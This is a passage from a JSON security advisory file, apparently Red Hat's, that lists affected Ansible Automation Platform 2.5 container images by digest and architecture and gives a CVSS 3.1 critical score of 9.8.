"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
